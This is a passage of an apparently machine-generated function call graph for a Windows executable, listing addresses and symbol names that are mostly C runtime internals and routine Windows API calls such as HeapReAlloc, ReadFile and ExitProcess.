19637->19641 19672 691673 19637->19672 19639->19614 19640->19613 19641->19635 19644 68c0e0 __dosmaperr 14 API calls 19641->19644 19641->19650 19642 692187 19643 68ad27 ___free_lconv_mon 14 API calls 19642->19643 19643->19641 19645 69221f 19644->19645 19646 69222f 19645->19646 19647 692227 19645->19647 19649 68a99c ___std_exception_copy 29 API calls 19646->19649 19648 68ad27 ___free_lconv_mon 14 API calls 19647->19648 19648->19650 19651 69223b 19649->19651 19650->19620 19652 6922b3 19651->19652 19653 692242 19651->19653 19654 6872c9 __Getctype 11 API calls 19652->19654 19681 69952c 19653->19681 19656 6922bd 19654->19656 19658 692269 19660 686bb1 __dosmaperr 14 API calls 19658->19660 19659 692288 19661 68ad27 ___free_lconv_mon 14 API calls 19659->19661 19662 69226e 19660->19662 19661->19635 19663 68ad27 ___free_lconv_mon 14 API calls 19662->19663 19663->19650 19665 6922cb 19664->19665 19666 6920ad 19664->19666 19696 69232d 19665->19696 19666->19614 19666->19615 19666->19617 19670 6922ee 19668->19670 19671 69214b 19668->19671 19670->19671 19711 69943b 19670->19711 19671->19624 19671->19630 19673 69169b 19672->19673 19674 691680 19672->19674 19676 6916aa 19673->19676 19811 6983c4 19673->19811 19674->19673 19675 69168c 19674->19675 19677 686bb1 __dosmaperr 14 API calls 19675->19677 19818 694976 19676->19818 19680 691691 std::invalid_argument::invalid_argument 19677->19680 19680->19642 19830 68c0a1 19681->19830 19686 69959f 19688 6995ab 19686->19688 19690 68ad27 ___free_lconv_mon 14 API calls 19686->19690 19687 68c0a1 39 API calls 19689 69957c 19687->19689 19692 68ad27 ___free_lconv_mon 14 API calls 19688->19692 19693 692263 19688->19693 19691 681524 17 API calls 19689->19691 19690->19688 19694 699589 19691->19694 19692->19693 19693->19658 19693->19659 19694->19686 19695 699593 SetEnvironmentVariableW 19694->19695 19695->19686 19697 69233b 19696->19697 19698 692340 19696->19698 19697->19666 19699 68c0e0 __dosmaperr 14 API calls 19698->19699 19708 69235d 19699->19708 19700 6923cb 19702 687806 CallUnexpected 39 API calls 19700->19702 19701 6923ba 19703 68ad27 ___free_lconv_mon 14 API calls 19701->19703 19704 6923d0 19702->19704 19703->19697 19705 6872c9 __Getctype 11 API calls 19704->19705 19706 6923dc 19705->19706 19707 68c0e0 __dosmaperr 14 API calls 19707->19708 19708->19700 19708->19701 19708->19704 19708->19707 19709 68ad27 ___free_lconv_mon 14 API calls 19708->19709 19710 68a99c ___std_exception_copy 29 API calls 19708->19710 19709->19708 19710->19708 19712 699449 19711->19712 19713 69944f 19711->19713 19716 69a08b 19712->19716 19719 69a043 19712->19719 19729 699464 19713->19729 19749 69a0a1 19716->19749 19718 69a049 19721 686bb1 __dosmaperr 14 API calls 19718->19721 19719->19718 19722 69a066 19719->19722 19720 69a059 19720->19670 19723 69a04e 19721->19723 19725 686bb1 __dosmaperr 14 API calls 19722->19725 19728 69a084 19722->19728 19724 68729c __strnicoll 29 API calls 19723->19724 19724->19720 19726 69a075 19725->19726 19727 68729c __strnicoll 29 API calls 19726->19727 19727->19720 19728->19670 19730 68142a __strnicoll 39 API calls 19729->19730 19731 69947a 19730->19731 19732 69945f 19731->19732 19733 699496 19731->19733 19734 6994ad 19731->19734 19732->19670 19735 686bb1 __dosmaperr 14 API calls 19733->19735 19737 6994c8 19734->19737 19738 6994b6 19734->19738 19736 69949b 19735->19736 19739 68729c __strnicoll 29 API calls 19736->19739 19741 6994e8 19737->19741 19742 6994d5 19737->19742 19740 686bb1 __dosmaperr 14 API calls 19738->19740 19739->19732 19743 6994bb 19740->19743 19767 69a16c 19741->19767 19744 69a0a1 __strnicoll 39 API calls 19742->19744 19746 68729c __strnicoll 29 API calls 19743->19746 19744->19732 19746->19732 19748 686bb1 __dosmaperr 14 API calls 19748->19732 19750 69a0cb 19749->19750 19751 69a0b1 19749->19751 19753 69a0ea 19750->19753 19754 69a0d3 19750->19754 19752 686bb1 __dosmaperr 14 API calls 19751->19752 19756 69a0b6 19752->19756 19755 69a0f6 19753->19755 19759 69a10d 19753->19759 19757 686bb1 __dosmaperr 14 API calls 19754->19757 19758 686bb1 __dosmaperr 14 API calls 19755->19758 19760 68729c __strnicoll 29 API calls 19756->19760 19761 69a0d8 19757->19761 19762 69a0fb 19758->19762 19763 68142a __strnicoll 39 API calls 19759->19763 19766 69a0c1 19759->19766 19760->19766 19764 68729c __strnicoll 29 API calls 19761->19764 19765 68729c __strnicoll 29 API calls 19762->19765 19763->19766 19764->19766 19765->19766 19766->19720 19768 68142a __strnicoll 39 API calls 19767->19768 19769 69a17f 19768->19769 19772 69a1b2 19769->19772 19775 69a1e6 __strnicoll 19772->19775 19773 67ba3f __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 19774 6994fe 19773->19774 19774->19732 19774->19748 19776 69a266 19775->19776 19777 69a44a 19775->19777 19779 69a253 GetCPInfo 19775->19779 19784 69a26a 19775->19784 19778 68adaf __strnicoll MultiByteToWideChar 19776->19778 19776->19784 19781 69a2ec 19778->19781 19779->19776 19779->19784 19780 69a43e 19783 67ea27 __freea 14 API calls 19780->19783 19781->19780 19782 68ad61 __strnicoll 15 API calls 19781->19782 19781->19784 19785 69a313 __alloca_probe_16 19781->19785 19782->19785 19783->19784 19784->19773 19784->19777 19785->19780 19786 68adaf __strnicoll MultiByteToWideChar 19785->19786 19787 69a35f 19786->19787 19787->19780 19788 68adaf __strnicoll MultiByteToWideChar 19787->19788 19789 69a37b 19788->19789 19789->19780 19790 69a389 19789->19790 19791 69a3ec 19790->19791 19792 68ad61 __strnicoll 15 API calls 19790->19792 19796 69a3a2 __alloca_probe_16 19790->19796 19793 67ea27 __freea 14 API calls 19791->19793 19792->19796 19794 69a3f2 19793->19794 19795 67ea27 __freea 14 API calls 19794->19795 19795->19784 19796->19791 19797 68adaf __strnicoll MultiByteToWideChar 19796->19797 19798 69a3e5 19797->19798 19798->19791 19799 69a40e 19798->19799 19805 68b89c 19799->19805 19802 67ea27 __freea 14 API calls 19806 68beac std::_Locinfo::_Locinfo_dtor 5 API calls 19805->19806 19807 68b8a7 19806->19807 19808 68b8ad 19807->19808 19809 68bbe6 __strnicoll 5 API calls 19807->19809 19808->19802 19810 68b8ed CompareStringW 19809->19810 19810->19808 19812 6983cf 19811->19812 19813 6983e4 HeapSize 19811->19813 19814 686bb1 __dosmaperr 14 API calls 19812->19814 19813->19676 19815 6983d4 19814->19815 19816 68729c __strnicoll 29 API calls 19815->19816 19817 6983df 19816->19817 19817->19676 19819 69498e 19818->19819 19820 694983 19818->19820 19822 694996 19819->19822 19828 69499f __dosmaperr 19819->19828 19821 68ad61 __strnicoll 15 API calls 19820->19821 19826 69498b 19821->19826 19823 68ad27 ___free_lconv_mon 14 API calls 19822->19823 19823->19826 19824 6949c9 HeapReAlloc 19824->19826 19824->19828 19825 6949a4 19827 686bb1 __dosmaperr 14 API calls 19825->19827 19826->19680 19827->19826 19828->19824 19828->19825 19829 684d3c std::ios_base::_Init 2 API calls 19828->19829 19829->19828 19831 68142a __strnicoll 39 API calls 19830->19831 19832 68c0b3 19831->19832 19833 68c0c5 19832->19833 19838 68b87d 19832->19838 19835 681524 19833->19835 19844 68157c 19835->19844 19841 68be92 19838->19841 19842 68be0d __dosmaperr 5 API calls 19841->19842 19843 68b885 19842->19843 19843->19833 19845 68158a 19844->19845 19846 6815a4 19844->19846 19862 68150a 19845->19862 19848 6815ca 19846->19848 19849 6815ab 19846->19849 19850 68adaf __strnicoll MultiByteToWideChar 19848->19850 19854 68153c 19849->19854 19866 6814cb 19849->19866 19851 6815d9 19850->19851 19853 6815e0 GetLastError 19851->19853 19856 681606 19851->19856 19858 6814cb 15 API calls 19851->19858 19871 686bd7 19853->19871 19854->19686 19854->19687 19856->19854 19859 68adaf __strnicoll MultiByteToWideChar 19856->19859 19858->19856 19861 68161d 19859->19861 19860 686bb1 __dosmaperr 14 API calls 19860->19854 19861->19853 19861->19854 19863 68151d 19862->19863 19864 681515 19862->19864 19863->19854 19865 68ad27 ___free_lconv_mon 14 API calls 19864->19865 19865->19863 19867 68150a 14 API calls 19866->19867 19868 6814d9 19867->19868 19876 6814ac 19868->19876 19879 686bc4 19871->19879 19873 686be2 __dosmaperr 19874 686bb1 __dosmaperr 14 API calls 19873->19874 19875 6815ec 19874->19875 19875->19860 19877 68ad61 __strnicoll 15 API calls 19876->19877 19878 6814b9 19877->19878 19878->19854 19880 68b104 __dosmaperr 14 API calls 19879->19880 19881 686bc9 19880->19881 19881->19873 19934 6741c0 19882->19934 19884 67286b 19894 67287f 19884->19894 19938 676e00 19884->19938 19889 6729bd 19890 67ba3f __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 19889->19890 19891 671c45 19890->19891 19895 6724c0 19891->19895 19892 6728ad std::ios_base::_Ios_base_dtor 19957 676f10 19892->19957 19962 6745c0 19894->19962 19897 6724f0 19895->19897 19896 6741c0 39 API calls 19909 6725a0 19896->19909 19897->19896 19898 6745c0 39 API calls 19899 672803 19898->19899 19900 674610 39 API calls 19899->19900 19901 672816 19900->19901 19904 67ba3f __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 19901->19904 19902 6725b4 19902->19898 19903 67266d 19907 6726d2 19903->19907 20935 67b4c0 19903->20935 19906 671c5c 19904->19906 19911 6722d0 19906->19911 19907->19902 19910 674480 70 API calls 19907->19910 19908 674480 70 API calls 19908->19909 19909->19902 19909->19903 19909->19908 19910->19907 20946 6722f0 19911->20946 19935 6741e0 19934->19935 19937 6741fd 19935->19937 19970 6746e0 19935->19970 19937->19884 19980 67bd52 19938->19980 19942 676e65 19994 67bd83 19942->19994 19943 676e3a 19943->19942 20001 676ff0 19943->20001 19946 676ef0 19948 67ba3f __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 19946->19948 19950 676efa 19948->19950 19949 676e90 20015 6749e0 19949->20015 19950->19892 20276 677520 19957->20276 19963 6745e5 19962->19963 20791 675920 19963->20791 19966 674610 19967 674624 19966->19967 19969 67463f 19967->19969 20931 676b10 19967->20931 19969->19889 19971 674708 19970->19971 19972 674789 19971->19972 19974 6741c0 39 API calls 19971->19974 19973 67ba3f __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 19972->19973 19975 674793 19973->19975 19978 674723 19974->19978 19975->19937 19976 674736 19977 674610 39 API calls 19976->19977 19977->19972 19978->19976 19979 6745c0 39 API calls 19978->19979 19979->19976 19981 67bd61 19980->19981 19982 67bd68 19980->19982 20028 6875c2 19981->20028 19983 676e24 19982->19983 20033 67e608 EnterCriticalSection 19982->20033 19986 6747e0 19983->19986 19987 674802 19986->19987 19988 67483e 19986->19988 19990 67bd52 std::_Lockit::_Lockit 7 API calls 19987->19990 19989 67ba3f __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 19988->19989 19991 674850 19989->19991 19992 674813 19990->19992 19991->19943 19993 67bd83 std::_Lockit::~_Lockit 2 API calls 19992->19993 19993->19988 19995 6875d0 19994->19995 19996 67bd8d 19994->19996 20083 6875ab LeaveCriticalSection 19995->20083 19997 67bda0 19996->19997 20082 67e616 LeaveCriticalSection 19996->20082 19997->19946 20000 6875d7 20000->19946 20002 677010 20001->20002 20003 67706c 20001->20003 20002->20003 20084 67b9cb 20002->20084 20004 67ba3f __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 20003->20004 20006 676e82 20004->20006 20006->19949 20011 6749b0 20006->20011 20007 677028 20095 674b10 20007->20095 20012 6749c8 20011->20012 20013 67f0bd std::_Throw_Cpp_error RaiseException 20012->20013 20014 6749dd 20013->20014 20016 674a10 20015->20016 20017 67ba3f __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 20016->20017 20018 674a1d 20017->20018 20019 67bdf6 20018->20019 20020 67be01 ___std_exception_copy 20019->20020 20021 676eb2 20020->20021 20272 67c31d 20020->20272 20024 674a30 20021->20024 20025 674a5c 20024->20025 20026 67ba3f __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 20025->20026 20027 674a69 20026->20027 20027->19942 20034 68bd0b 20028->20034 20033->19983 20035 68be92 std::_Locinfo::_Locinfo_dtor 5 API calls 20034->20035 20036 68bd10 20035->20036 20055 68beac 20036->20055 20054 68bd3d 20054->20054 20056 68be0d __dosmaperr 5 API calls 20055->20056 20057 68bd15 20056->20057 20058 68bec6 20057->20058 20059 68be0d __dosmaperr 5 API calls 20058->20059 20060 68bd1a 20059->20060 20061 68bee0 20060->20061 20062 68be0d __dosmaperr 5 API calls 20061->20062 20063 68bd1f 20062->20063 20064 68befa 20063->20064 20065 68be0d __dosmaperr 5 API calls 20064->20065 20066 68bd24 20065->20066 20067 68bf14 20066->20067 20068 68be0d __dosmaperr 5 API calls 20067->20068 20069 68bd29 20068->20069 20070 68bf2e 20069->20070 20071 68be0d __dosmaperr 5 API calls 20070->20071 20072 68bd2e 20071->20072 20073 68bf48 20072->20073 20074 68be0d __dosmaperr 5 API calls 20073->20074 20075 68bd33 20074->20075 20076 68bf62 20075->20076 20077 68be0d __dosmaperr 5 API calls 20076->20077 20078 68bd38 20077->20078 20079 68bf7c 20078->20079 20080 68be0d __dosmaperr 5 API calls 20079->20080 20081 68bf92 20080->20081 20081->20054 20082->19997 20083->20000 20085 67b9d0 ___std_exception_copy 20084->20085 20086 67b9ea 20085->20086 20087 684d3c std::ios_base::_Init 2 API calls 20085->20087 20088 67b9ec 20085->20088 20086->20007 20087->20085 20089 67de77 std::ios_base::_Init 20088->20089 20091 67b9f6 Concurrency::cancel_current_task 20088->20091 20090 67f0bd std::_Throw_Cpp_error RaiseException 20089->20090 20092 67de93 20090->20092 20121 67f0bd 20091->20121 20094 67c339 20096 67bd52 std::_Lockit::_Lockit 7 API calls 20095->20096 20097 674b30 20096->20097 20098 674b7f 20097->20098 20099 674b9b 20097->20099 20124 67be78 20098->20124 20133 67c37a 20099->20133 20122 67f0d7 20121->20122 20123 67f105 RaiseException 20121->20123 20122->20123 20123->20094 20140 6887a0 20124->20140 20242 67c467 20133->20242 20136 67f0bd std::_Throw_Cpp_error RaiseException 20137 67c399 20136->20137 20245 6736c0 20137->20245 20141 68bd0b std::_Locinfo::_Locinfo_dtor 5 API calls 20140->20141 20142 6887ad 20141->20142 20149 6889d2 20142->20149 20150 6889de ___scrt_is_nonwritable_in_current_image 20149->20150 20157 687594 EnterCriticalSection 20150->20157 20152 6889ec 20158 688873 20152->20158 20154 6889f9 20186 688a21 20154->20186 20157->20152 20189 6887d8 20158->20189 20160 68888e 20161 68afb3 __Getctype 39 API calls 20160->20161 20185 6888d9 20160->20185 20162 68889b 20161->20162 20236 694cbf 20162->20236 20185->20154 20241 6875ab LeaveCriticalSection 20186->20241 20188 67be85 20190 6887f2 20189->20190 20191 6887e4 20189->20191 20193 6949df std::_Locinfo::_Locinfo_dtor 41 API calls 20190->20193 20192 684e9b std::_Locinfo::_Locinfo_dtor 60 API calls 20191->20192 20194 6887ee 20192->20194 20195 688809 20193->20195 20194->20160 20196 688868 20195->20196 20197 68c0e0 __dosmaperr 14 API calls 20195->20197 20198 6872c9 __Getctype 11 API calls 20196->20198 20199 688824 20197->20199 20200 688872 20198->20200 20202 6949df std::_Locinfo::_Locinfo_dtor 41 API calls 20199->20202 20210 68884c 20199->20210 20203 6887d8 std::_Locinfo::_Locinfo_dtor 64 API calls 20200->20203 20201 68ad27 ___free_lconv_mon 14 API calls 20204 688861 20201->20204 20205 68883b 20202->20205 20208 68888e 20203->20208 20204->20160 20206 68884e 20205->20206 20207 688842 20205->20207 20209 684e9b std::_Locinfo::_Locinfo_dtor 60 API calls 20206->20209 20207->20196 20207->20210 20211 68afb3 __Getctype 39 API calls 20208->20211 20235 6888d9 20208->20235 20209->20210 20210->20201 20212 68889b 20211->20212 20235->20160 20237 694cd3 _Fputc 20236->20237 20238 694fa4 std::_Locinfo::_Locinfo_dtor 41 API calls 20237->20238 20239 694ceb _Fputc 20238->20239 20241->20188 20249 676a70 20242->20249 20246 6736f7 std::invalid_argument::invalid_argument 20245->20246 20247 67f69a ___std_exception_copy 29 API calls 20246->20247 20248 67370f 20247->20248 20250 676ab1 std::invalid_argument::invalid_argument 20249->20250 20255 67f69a 20250->20255 20253 67ba3f __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 20254 676ada 20253->20254 20254->20136 20256 67f6a7 ___std_exception_copy 20255->20256 20260 676ad0 20255->20260 20257 68a99c ___std_exception_copy 29 API calls 20256->20257 20259 67f6d4 20256->20259 20256->20260 20257->20259 20258 68831e ___std_exception_copy 14 API calls 20258->20260 20259->20258 20260->20253 20273 67c32b Concurrency::cancel_current_task 20272->20273 20274 67f0bd std::_Throw_Cpp_error RaiseException 20273->20274 20275 67c339 20274->20275 20291 67a120 20276->20291 20278 677693 20297 67a2a0 20278->20297 20279 677582 20279->20278 20343 688339 20279->20343 20282 6776e1 20292 67a146 std::_Throw_Cpp_error 20291->20292 20354 67ace0 20292->20354 20295 67ba3f __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 20296 67a15b 20295->20296 20296->20279 20298 67a2ba 20297->20298 20299 67a2df 20298->20299 20300 67a2c9 20298->20300 20362 67ada0 20299->20362 20358 67ad50 20300->20358 20303 67a2d7 20303->20282 20344 688348 20343->20344 20345 68835f __floor_pentium4 20343->20345 20346 686bb1 __dosmaperr 14 API calls 20344->20346 20349 688358 __floor_pentium4 20345->20349 20755 693f89 20345->20755 20347 68834d 20346->20347 20348 68729c __strnicoll 29 API calls 20347->20348 20348->20349 20349->20278 20355 67ad0a std::_Throw_Cpp_error 20354->20355 20356 67ba3f __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 20355->20356 20357 67a151 20356->20357 20357->20295 20359 67ad78 std::_Throw_Cpp_error 20358->20359 20360 67ba3f __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 20359->20360 20361 67ad96 20360->20361 20361->20303 20363 67ae34 20362->20363 20365 67add8 std::_Throw_Cpp_error 20362->20365 20368 67aec0 20363->20368 20366 67ba3f __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 20365->20366 20367 67ae72 20366->20367 20367->20303 20386 6731c0 20368->20386 20387 6731db std::_Throw_Cpp_error 20386->20387 20388 67ba3f __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 20387->20388 20389 673236 20388->20389 20756 693fc2 __floor_pentium4 20755->20756 20758 693fe9 __floor_pentium4 20756->20758 20766 6943ff 20756->20766 20759 69402c 20758->20759 20760 694007 20758->20760 20778 69408b 20759->20778 20770 69435f 20760->20770 20763 694027 __floor_pentium4 20767 69442a __raise_exc 20766->20767 20768 694623 RaiseException 20767->20768 20769 69463b 20768->20769 20769->20758 20771 69436c 20770->20771 20772 69437b __floor_pentium4 20771->20772 20774 6943aa __startOneArgErrorHandling __floor_pentium4 20771->20774 20773 69408b __floor_pentium4 14 API calls 20772->20773 20775 694394 20773->20775 20776 6943f8 20774->20776 20777 69408b __floor_pentium4 14 API calls 20774->20777 20775->20763 20776->20763 20777->20776 20779 6940af 20778->20779 20780 694098 20778->20780 20781 686bb1 __dosmaperr 14 API calls 20779->20781 20782 6940b4 20780->20782 20783 686bb1 __dosmaperr 14 API calls 20780->20783 20781->20782 20782->20763 20784 6940a7 20783->20784 20784->20763 20794 675970 20791->20794 20795 6759b4 20794->20795 20796 675a5c 20794->20796 20799 67f0bd std::_Throw_Cpp_error RaiseException 20795->20799 20800 6759d4 20795->20800 20797 67ba3f __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 20796->20797 20798 6729b1 20797->20798 20798->19966 20799->20800 20806 675a70 20800->20806 20802 675a2f 20809 675ab0 20802->20809 20814 675c50 20806->20814 20808 675a87 std::ios_base::_Init 20808->20802 20841 676000 20809->20841 20817 675c90 20814->20817 20818 675cb7 20817->20818 20819 675c58 20817->20819 20825 67ba4d AcquireSRWLockExclusive 20818->20825 20819->20808 20821 675cc5 20821->20819 20830 67bb02 20821->20830 20826 67ba61 20825->20826 20827 67ba66 ReleaseSRWLockExclusive 20826->20827 20834 67baed SleepConditionVariableSRW 20826->20834 20827->20821 20835 67bb17 20830->20835 20833 67ba9c AcquireSRWLockExclusive ReleaseSRWLockExclusive WakeAllConditionVariable 20833->20819 20834->20826 20836 67bb26 20835->20836 20837 67bb2d 20835->20837 20839 6868f9 std::ios_base::_Init 32 API calls 20836->20839 20838 686888 std::ios_base::_Init 32 API calls 20837->20838 20840 675ce0 20838->20840 20839->20840 20840->20833 20850 671d50 20841->20850 20851 671d79 std::_Throw_Cpp_error 20850->20851 20867 672fa0 20851->20867 20854 67ba3f __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 20855 671dae 20854->20855 20856 6760e0 20855->20856 20880 676290 20856->20880 20868 6731c0 std::_Throw_Cpp_error 5 API calls 20867->20868 20869 672fcd 20868->20869 20870 673240 std::_Throw_Cpp_error 30 API calls 20869->20870 20871 672fdf std::_Throw_Cpp_error 20869->20871 20870->20871 20872 6731c0 std::_Throw_Cpp_error 5 API calls 20871->20872 20879 673018 std::_Throw_Cpp_error 20871->20879 20873 673072 20872->20873 20874 6732c0 std::_Throw_Cpp_error 5 API calls 20873->20874 20875 673089 20874->20875 20876 673360 std::_Throw_Cpp_error 30 API calls 20875->20876 20876->20879 20877 67ba3f __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 20878 671da1 20877->20878 20878->20854 20879->20877 20881 6762b4 std::_Throw_Cpp_error 20880->20881 20904 676910 20881->20904 20884 67ba3f __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 20885 676129 20884->20885 20886 6761e0 20885->20886 20905 6731c0 std::_Throw_Cpp_error 5 API calls 20904->20905 20906 67693d 20905->20906 20907 673240 std::_Throw_Cpp_error 30 API calls 20906->20907 20908 67694f std::_Throw_Cpp_error 20906->20908 20907->20908 20909 6731c0 std::_Throw_Cpp_error 5 API calls 20908->20909 20916 676988 std::_Throw_Cpp_error 20908->20916 20910 6769ca 20909->20910 20911 6732c0 std::_Throw_Cpp_error 5 API calls 20910->20911 20912 6769e1 20911->20912 20913 673360 std::_Throw_Cpp_error 30 API calls 20912->20913 20913->20916 20914 67ba3f __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 20915 676302 20914->20915 20915->20884 20916->20914 20932 676b2e 20931->20932 20933 6745c0 39 API calls 20932->20933 20934 676b36 20932->20934 20933->20934 20934->19969 20938 67d1e3 20935->20938 20941 67cbe8 20938->20941 20942 67b501 20941->20942 20943 67cc0e codecvt 20941->20943 20942->19907 20943->20942 20944 67cdf5 70 API calls 20943->20944 20945 67ce13 70 API calls 20943->20945 20944->20943 20945->20943 20953 676cf0 20946->20953 20954 676d14 20953->20954 20955 674290 67 API calls 20954->20955 20956 676d22 std::ios_base::_Ios_base_dtor 20955->20956 20957 67ba3f __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 20956->20957 20958 672318 20957->20958 20959 676bf0 20958->20959 20960 6741c0 39 API calls 20959->20960 20961 676c1f 20960->20961 20964 674480 70 API calls 20961->20964 20969 676c32 20961->20969 20962 6745c0 39 API calls 20963 676cc2 20962->20963 20964->20969 20969->20962 21208 684b82 21207->21208 21209 684b94 21207->21209 21211 67e3d9 __CreateFrameInfo GetModuleHandleW 21208->21211 21219 684cef 21209->21219 21213 684b87 21211->21213 21213->21209 21234 684a89 GetModuleHandleExW 21213->21234 21214 67ef49 21214->18887 21220 684cfb ___scrt_is_nonwritable_in_current_image 21219->21220 21240 687594 EnterCriticalSection 21220->21240 21222 684d05 21241 684bec 21222->21241 21224 684d12 21245 684d30 21224->21245 21227 684b24 21270 684b0b 21227->21270 21229 684b2e 21230 684b42 21229->21230 21231 684b32 GetCurrentProcess TerminateProcess 21229->21231 21232 684a89 __CreateFrameInfo 3 API calls 21230->21232 21231->21230 21233 684b4a ExitProcess 21232->21233 21235 684ac8 GetProcAddress 21234->21235 21236 684ae9 21234->21236 21235->21236 21237 684adc 21235->21237 21238 684af8 21236->21238 21239 684aef FreeLibrary 21236->21239 21237->21236 21238->21209 21239->21238 21240->21222 21242 684bf8 ___scrt_is_nonwritable_in_current_image __CreateFrameInfo 21241->21242 21244 684c5c __CreateFrameInfo 21242->21244 21248 6868bb 21242->21248 21244->21224 21269 6875ab LeaveCriticalSection 21245->21269 21247 684bcb 21247->21214 21247->21227 21249 6868c7 __EH_prolog3 21248->21249 21252 686b46 21249->21252 21251 6868ee std::ios_base::_Init 21251->21244 21253 686b52 ___scrt_is_nonwritable_in_current_image 21252->21253 21260 687594 EnterCriticalSection 21253->21260 21255 686b60 21261 686a11 21255->21261 21260->21255 21262 686a30 21261->21262 21263 686a28 21261->21263 21262->21263 21264 68ad27 ___free_lconv_mon 14 API calls 21262->21264 21265 686b95 21263->21265 21264->21263 21268 6875ab LeaveCriticalSection 21265->21268 21267 686b7e 21267->21251 21268->21267 21269->21247 21273 68e545 21270->21273 21272 684b10 __CreateFrameInfo 21272->21229 21274 68e554 __CreateFrameInfo 21273->21274 21275 68e561 21274->21275 21277 68bc80 21274->21277 21275->21272 21278 68be0d __dosmaperr 5 API calls 21277->21278 21279 68bc9c 21278->21279 21279->21275 23023 67d2b9 23024 67d2db 23023->23024 23028 67d2f0 23023->23028 23029 67d431 23024->23029 23032 67d44c 23029->23032 23034 67d49d 23029->23034 23030 67ba3f __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 23031 67d2e0 23030->23031 23031->23028 23035 688433 23031->23035 23033 68846e 69 API calls 23032->23033 23032->23034 23033->23034 23034->23030 23036 68843e 23035->23036 23037 688453 23035->23037 23038 686bb1 __dosmaperr 14 API calls 23036->23038 23037->23036 23039 68845a 23037->23039 23040 688443 23038->23040 23045 686c61 23039->23045 23042 68729c __strnicoll 29 API calls 23040->23042 23044 68844e 23042->23044 23043 688469 23043->23028 23044->23028 23046 686c74 _Fputc 23045->23046 23049 686eda 23046->23049 23048 686c89 _Fputc 23048->23043 23051 686ee6 ___scrt_is_nonwritable_in_current_image 23049->23051 23050 686eec 23052 687445 _Fputc 29 API calls 23050->23052 23051->23050 23053 686f2f 23051->23053 23059 686f07 23052->23059 23060 681d4e EnterCriticalSection 23053->23060 23055 686f3b 23061 686dee 23055->23061 23057 686f51 23072 686f7a 23057->23072 23059->23048 23060->23055 23062 686e01 23061->23062 23063 686e14 23061->23063 23062->23057 23075 686d15 23063->23075 23065 686e37 23066 686ec5 23065->23066 23067 686e52 23065->23067 23079 69197a 23065->23079 23066->23057 23069 687a7b ___scrt_uninitialize_crt 64 API calls 23067->23069 23071 686e65 23069->23071 23093 691760 23071->23093 23134 681d62 LeaveCriticalSection 23072->23134 23074 686f82 23074->23059 23076 686d26 23075->23076 23077 686d7e 23075->23077 23076->23077 23078 691720 31 API calls 23076->23078 23077->23065 23078->23077 23080 691d4c 23079->23080 23081 691d5b 23080->23081 23082 691d83 23080->23082 23083 687445 _Fputc 29 API calls 23081->23083 23084 68e509 _Ungetc 29 API calls 23082->23084 23092 691d76 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 23083->23092 23085 691d8c 23084->23085 23096 69177e 23085->23096 23088 691e36 23099 6919d6 23088->23099 23090 691e4d 23090->23092 23111 691b81 23090->23111 23092->23067 23094 6918c1 _Fputc 31 API calls 23093->23094 23095 691779 23094->23095 23095->23066 23118 69179c 23096->23118 23100 6919e5 _Fputc 23099->23100 23101 68e509 _Ungetc 29 API calls 23100->23101 23102 691a01 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 23101->23102 23104 69177e 33 API calls 23102->23104 23110 691a0d 23102->23110 23103 67ba3f __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 23105 691b7f 23103->23105 23106 691a61 23104->23106 23105->23092 23107 691a93 ReadFile 23106->23107 23106->23110 23108 691aba 23107->23108 23107->23110 23109 69177e 33 API calls 23108->23109 23109->23110 23110->23103 23112 68e509 